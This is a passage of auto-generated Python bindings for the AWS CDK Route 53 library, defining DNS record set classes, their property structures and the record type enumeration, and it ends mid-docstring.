def cross_account_zone_delegation_role_name(self) -> typing.Optional[builtins.str]:
'''The name of the role created for cross account delegation.
:default: - A role name is generated automatically
'''
result = self._values.get("cross_account_zone_delegation_role_name")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PublicHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IRecordSet)
class RecordSet(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.RecordSet",
):
'''A record set.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
record_type: "RecordType",
target: "RecordTarget",
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param record_type: The record type.
:param target: The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = RecordSetProps(
record_type=record_type,
target=target,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
jsii.create(RecordSet, self, [scope, id, props])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
return typing.cast(builtins.str, jsii.get(self, "domainName"))
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.RecordSetOptions",
jsii_struct_bases=[],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
},
)
class RecordSetOptions:
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Options for a RecordSet.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.RecordSetProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"record_type": "recordType",
"target": "target",
},
)
class RecordSetProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
record_type: "RecordType",
target: "RecordTarget",
) -> None:
'''Construction properties for a RecordSet.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param record_type: The record type.
:param target: The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"record_type": record_type,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def record_type(self) -> "RecordType":
'''The record type.'''
result = self._values.get("record_type")
assert result is not None, "Required property 'record_type' is missing"
return typing.cast("RecordType", result)
@builtins.property
def target(self) -> "RecordTarget":
'''The target for this record, either ``RecordTarget.fromValues()`` or ``RecordTarget.fromAlias()``.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast("RecordTarget", result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RecordTarget(
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.RecordTarget",
):
'''Type union for a record that accepts multiple types of target.'''
def __init__(
self,
values: typing.Optional[typing.Sequence[builtins.str]] = None,
alias_target: typing.Optional[IAliasRecordTarget] = None,
) -> None:
'''
:param values: correspond with the chosen record type (e.g. for 'A' Type, specify one or more IP addresses).
:param alias_target: alias for targets such as CloudFront distribution to route traffic to.
'''
jsii.create(RecordTarget, self, [values, alias_target])
@jsii.member(jsii_name="fromAlias") # type: ignore[misc]
@builtins.classmethod
def from_alias(cls, alias_target: IAliasRecordTarget) -> "RecordTarget":
'''Use an alias as target.
:param alias_target: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromAlias", [alias_target]))
@jsii.member(jsii_name="fromIpAddresses") # type: ignore[misc]
@builtins.classmethod
def from_ip_addresses(cls, *ip_addresses: builtins.str) -> "RecordTarget":
'''Use ip addresses as target.
:param ip_addresses: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromIpAddresses", [*ip_addresses]))
@jsii.member(jsii_name="fromValues") # type: ignore[misc]
@builtins.classmethod
def from_values(cls, *values: builtins.str) -> "RecordTarget":
'''Use string values as target.
:param values: -
'''
return typing.cast("RecordTarget", jsii.sinvoke(cls, "fromValues", [*values]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="aliasTarget")
def alias_target(self) -> typing.Optional[IAliasRecordTarget]:
'''alias for targets such as CloudFront distribution to route traffic to.'''
return typing.cast(typing.Optional[IAliasRecordTarget], jsii.get(self, "aliasTarget"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="values")
def values(self) -> typing.Optional[typing.List[builtins.str]]:
'''correspond with the chosen record type (e.g. for 'A' Type, specify one or more IP addresses).'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "values"))
@jsii.enum(jsii_type="@aws-cdk/aws-route53.RecordType")
class RecordType(enum.Enum):
'''The record type.'''
A = "A"
'''route traffic to a resource, such as a web server, using an IPv4 address in dotted decimal notation.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#AFormat
'''
AAAA = "AAAA"
'''route traffic to a resource, such as a web server, using an IPv6 address in colon-separated hexadecimal format.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#AAAAFormat
'''
CAA = "CAA"
'''A CAA record specifies which certificate authorities (CAs) are allowed to issue certificates for a domain or subdomain.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#CAAFormat
'''
CNAME = "CNAME"
'''A CNAME record maps DNS queries for the name of the current record, such as acme.example.com, to another domain (example.com or example.net) or subdomain (acme.example.com or zenith.example.org).
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#CNAMEFormat
'''
DS = "DS"
'''A delegation signer (DS) record refers a zone key for a delegated subdomain zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#DSFormat
'''
MX = "MX"
'''An MX record specifies the names of your mail servers and, if you have two or more mail servers, the priority order.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#MXFormat
'''
NAPTR = "NAPTR"
'''A Name Authority Pointer (NAPTR) is a type of record that is used by Dynamic Delegation Discovery System (DDDS) applications to convert one value to another or to replace one value with another.
For example, one common use is to convert phone numbers into SIP URIs.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#NAPTRFormat
'''
NS = "NS"
'''An NS record identifies the name servers for the hosted zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#NSFormat
'''
PTR = "PTR"
'''A PTR record maps an IP address to the corresponding domain name.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#PTRFormat
'''
SOA = "SOA"
'''A start of authority (SOA) record provides information about a domain and the corresponding Amazon Route 53 hosted zone.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SOAFormat
'''
SPF = "SPF"
'''SPF records were formerly used to verify the identity of the sender of email messages.
Instead of an SPF record, we recommend that you create a TXT record that contains the applicable value.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SPFFormat
'''
SRV = "SRV"
'''An SRV record Value element consists of four space-separated values.
The first three values are
decimal numbers representing priority, weight, and port. The fourth value is a domain name.
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#SRVFormat
'''
TXT = "TXT"
'''A TXT record contains one or more strings that are enclosed in double quotation marks (").
:see: https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/ResourceRecordTypes.html#TXTFormat
'''
class SrvRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.SrvRecord",
):
'''A DNS SRV record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence["SrvRecordValue"],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = SrvRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(SrvRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.SrvRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class SrvRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence["SrvRecordValue"],
) -> None:
'''Construction properties for a SrvRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List["SrvRecordValue"]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List["SrvRecordValue"], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SrvRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.SrvRecordValue",
jsii_struct_bases=[],
name_mapping={
"host_name": "hostName",
"port": "port",
"priority": "priority",
"weight": "weight",
},
)
class SrvRecordValue:
def __init__(
self,
*,
host_name: builtins.str,
port: jsii.Number,
priority: jsii.Number,
weight: jsii.Number,
) -> None:
'''Properties for a SRV record value.
:param host_name: The server host name.
:param port: The port.
:param priority: The priority.
:param weight: The weight.
'''
self._values: typing.Dict[str, typing.Any] = {
"host_name": host_name,
"port": port,
"priority": priority,
"weight": weight,
}
@builtins.property
def host_name(self) -> builtins.str:
'''The server host name.'''
result = self._values.get("host_name")
assert result is not None, "Required property 'host_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def port(self) -> jsii.Number:
'''The port.'''
result = self._values.get("port")
assert result is not None, "Required property 'port' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def priority(self) -> jsii.Number:
'''The priority.'''
result = self._values.get("priority")
assert result is not None, "Required property 'priority' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def weight(self) -> jsii.Number:
'''The weight.'''
result = self._values.get("weight")
assert result is not None, "Required property 'weight' is missing"
return typing.cast(jsii.Number, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SrvRecordValue(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class TxtRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.TxtRecord",
):
'''A DNS TXT record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The text values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = TxtRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(TxtRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.TxtRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class TxtRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a TxtRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The text values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The text values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TxtRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class VpcEndpointServiceDomainName(
aws_cdk.core.Construct,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.VpcEndpointServiceDomainName",
):
'''A Private DNS configuration for a VPC endpoint service.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
endpoint_service: aws_cdk.aws_ec2.IVpcEndpointService,
public_hosted_zone: IPublicHostedZone,
) -> None:
'''
:param scope: -
:param id: -
:param domain_name: The domain name to use. This domain name must be owned by this account (registered through Route53), or delegated to this account. Domain ownership will be verified by AWS before private DNS can be used.
:param endpoint_service: The VPC Endpoint Service to configure Private DNS for.
:param public_hosted_zone: The public hosted zone to use for the domain.
'''
props = VpcEndpointServiceDomainNameProps(
domain_name=domain_name,
endpoint_service=endpoint_service,
public_hosted_zone=public_hosted_zone,
)
jsii.create(VpcEndpointServiceDomainName, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.VpcEndpointServiceDomainNameProps",
jsii_struct_bases=[],
name_mapping={
"domain_name": "domainName",
"endpoint_service": "endpointService",
"public_hosted_zone": "publicHostedZone",
},
)
class VpcEndpointServiceDomainNameProps:
def __init__(
self,
*,
domain_name: builtins.str,
endpoint_service: aws_cdk.aws_ec2.IVpcEndpointService,
public_hosted_zone: IPublicHostedZone,
) -> None:
'''Properties to configure a VPC Endpoint Service domain name.
:param domain_name: The domain name to use. This domain name must be owned by this account (registered through Route53), or delegated to this account. Domain ownership will be verified by AWS before private DNS can be used.
:param endpoint_service: The VPC Endpoint Service to configure Private DNS for.
:param public_hosted_zone: The public hosted zone to use for the domain.
'''
self._values: typing.Dict[str, typing.Any] = {
"domain_name": domain_name,
"endpoint_service": endpoint_service,
"public_hosted_zone": public_hosted_zone,
}
@builtins.property
def domain_name(self) -> builtins.str:
'''The domain name to use.
This domain name must be owned by this account (registered through Route53),
or delegated to this account. Domain ownership will be verified by AWS before
private DNS can be used.
:see: https://docs.aws.amazon.com/vpc/latest/userguide/endpoint-services-dns-validation.html
'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def endpoint_service(self) -> aws_cdk.aws_ec2.IVpcEndpointService:
'''The VPC Endpoint Service to configure Private DNS for.'''
result = self._values.get("endpoint_service")
assert result is not None, "Required property 'endpoint_service' is missing"
return typing.cast(aws_cdk.aws_ec2.IVpcEndpointService, result)
@builtins.property
def public_hosted_zone(self) -> IPublicHostedZone:
'''The public hosted zone to use for the domain.'''
result = self._values.get("public_hosted_zone")
assert result is not None, "Required property 'public_hosted_zone' is missing"
return typing.cast(IPublicHostedZone, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceDomainNameProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ZoneDelegationOptions",
jsii_struct_bases=[],
name_mapping={"comment": "comment", "ttl": "ttl"},
)
class ZoneDelegationOptions:
def __init__(
self,
*,
comment: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Options available when creating a delegation relationship from one PublicHostedZone to another.
:param comment: A comment to add on the DNS record created to incorporate the delegation. Default: none
:param ttl: The TTL (Time To Live) of the DNS delegation record in DNS caches. Default: 172800
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the DNS record created to incorporate the delegation.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The TTL (Time To Live) of the DNS delegation record in DNS caches.
:default: 172800
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneDelegationOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class ZoneDelegationRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.ZoneDelegationRecord",
):
'''A record to delegate further lookups to a different set of name servers.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
name_servers: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param name_servers: The name servers to report in the delegation records.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = ZoneDelegationRecordProps(
name_servers=name_servers,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
jsii.create(ZoneDelegationRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ZoneDelegationRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"name_servers": "nameServers",
},
)
class ZoneDelegationRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
name_servers: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a ZoneDelegationRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param name_servers: The name servers to report in the delegation records.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"name_servers": name_servers,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def name_servers(self) -> typing.List[builtins.str]:
'''The name servers to report in the delegation records.'''
result = self._values.get("name_servers")
assert result is not None, "Required property 'name_servers' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneDelegationRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class ARecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.ARecord",
):
'''A DNS A record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
target: RecordTarget,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param target: The target.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = ARecordProps(
target=target, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(ARecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ARecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"target": "target",
},
)
class ARecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
target: RecordTarget,
) -> None:
'''Construction properties for a ARecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param target: The target.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def target(self) -> RecordTarget:
'''The target.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast(RecordTarget, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ARecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class AaaaRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.AaaaRecord",
):
'''A DNS AAAA record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
target: RecordTarget,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param target: The target.
